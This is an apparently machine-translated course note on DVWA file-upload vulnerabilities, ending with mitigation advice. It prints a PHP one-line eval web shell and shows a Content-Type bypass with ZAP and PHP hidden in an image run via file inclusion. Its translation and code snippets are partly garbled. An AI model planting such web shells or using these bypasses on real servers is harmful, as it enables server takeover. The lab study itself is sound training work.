"Notes" NetEase micro-professional-web security Engineer -04.web Security Combat-6. File Upload

When we register the forum, often can upload their own avatar, but if the control is not strict, criminals may use this way to upload executable code, causing security issues, here is the file Upload Vulnerability .

DVWA Combat

1. Open Phpstudy or XAMPP, run Apach and MySQL;

2. The browser enters Dvwa main interface, in the left column Select Dvwa security level is low, then enter the file Upload;

A very common interface for uploading files.

3. Although prompted to let us upload an image, but we can try to enter other file formats, such as PHP files, if you can upload a successful, we may be able to call it. Construct the following hack.php file:

<?php @eval($_get[' cmd])?>  //eval () function interprets the string in PHP code

Then click Upload, we found the success, but also returned the path!

.. /.. /hackable/uploads/hack.php succesfully uploaded!

So we can control the cmd parameter to let the server execute our code, the browser enters the following URL:

localhost/dvwa-1.9/vulnerabilities/upload/. /.. /hackable/uploads/hack.php?cmd=phpinfo ();

This is the famous "one word Trojan Horse".

4. Next we set the security level to medium, upload the same file, found the error:

Your image is not uploaded. We can only accept JPEG or PNG images.

Prompt only to accept JPEG and PNG files, view the background source code, found that the type of upload files, size has been limited, requires the file type must be JPEG or PNG, size can not exceed 100000B (about 97.6KB).

    // is it an image?    if $uploaded _type $uploaded _type = = "Image/png")        &&$uploaded _size < 100000)) {

A simple idea is to change our php file suffix to png, so can it be done? Can try the following, the result is that although the file can be uploaded, but when we call the above method ... Hack.png?cmd=phpinfo (), the discovery cannot be performed. That another way of thinking, can bypass the background of the detection, the PHP file to pass up? In other words, how does the background decide that we are uploading an image file? The backend source tells us that depending on $uploaded_type = $_files[' uploaded ' [' type '], we take a look at the Zap tool grab bag in the 2nd brute force hack (Zap installation using see section 4.2):

We found here that the Content-type is not a picture format, so we can modify here so that it passes through the check upload. Using ZAP to modify the request message is also very simple, click on the picture in the top column of the green Circle button to red, the browser opens the agent after all requests will be Zap Intercept, until we modify or confirm click on the Continue button next to the green button. In this way, we successfully upload PHP files that can be called by us.

6. Next we look at the high-level file upload, the use of all the methods above do not work, view the background code, found not only the file type, but also the filename suffix control.

    $uploaded _ext  substr $uploaded _name Strrpos $uploaded _name, '. ' ) + 1);     // is it an image?    if Strtolower $uploaded _ext Strtolower $uploaded _ext Strtolower $uploaded _ext ) = = "png") &&

In that case, there seems to be no way out. Here to introduce a "connotation map", can hide the PHP code in the picture: Prepare a picture file 1.jpg, and then put <?php phpinfo ()?> write 2.php, using the Windows cmd command to execute the following statement:

Copy 1.jpg/b+2.php/a hack.jpg

And then put hack.jpg upload, we found that the upload was successful, but when we enter the URL of this file in the browser, the display is this picture, how to let the inside of the code is executed?

Here we are going to combine the files mentioned in the previous section with the vulnerability to let the server execute our uploaded executable code! The parameters of our append page are:

File:///E:/Development/KPlayer/Web/PHP/phpStudy/WWW/DVWA-1.9/hackable/uploads/hack.jpg

After submitting the surprise discovery in a heap of garbled characters, there appeared a familiar Phpinfo page.

7. Finally we look at the impossible level, found that this method also does not, to view the background source, the original upload file has been renamed, while the content of the file is strictly checked, resulting in the attacker can not upload files containing malicious script.

    //$target _file = basename ($uploaded _name, '. '. $uploaded _ext). '-';    $target _file=MD5(uniqid() .$uploaded _name) . ‘.‘ .$uploaded _ext; $temp _file= ( (Ini_get(' upload_tmp_dir ') = = ')? (Sys_get_temp_dir ()): (Ini_get(' Upload_tmp_dir ' ) ) ); $temp _file. = Directory_separator.MD5(uniqid() .$uploaded _name) . ‘.‘ .$uploaded _ext;......//Strip Any metadata, by re-encoding image (Note, using Php-imagick are recommended over PHP-GD)        if($uploaded _type= = ' Image/jpeg ' ) {            $img= Imagecreatefromjpeg ($uploaded _tmp ); Imagejpeg ($img,$temp _file, 100); }        Else {            $img= Imagecreatefrompng ($uploaded _tmp ); Imagepng ($img,$temp _file, 9); } Imagedestroy ($img ); //Can We move the file to the Web root from the Temp folder?        if(Rename($temp _file, (GETCWD() . Directory_separator.$target _path.$target _file ) ) ) {            //yes!            Echo"<pre><a href= ' ${target_path}${target_file} ' >${target_file}</a> succesfully uploaded!</pre > "; }        Else {            //No            Echo' <pre>your image is not uploaded.</pre> '; }

Practical experience:

Because of the type of uploaded files, content is not strict filtering, check, so that the attacker can upload a file upload Trojan horse and other operations, endangering the security of the server. For this vulnerability, one is to prevent illegal file upload, one is to prohibit its operation, such as through file renaming, compression rebuild, the storage directory to perform permissions control, or store directory is not placed in the web medium measures.

"Notes" NetEase micro-professional-web security Engineer -04.web Security Combat-6. File Upload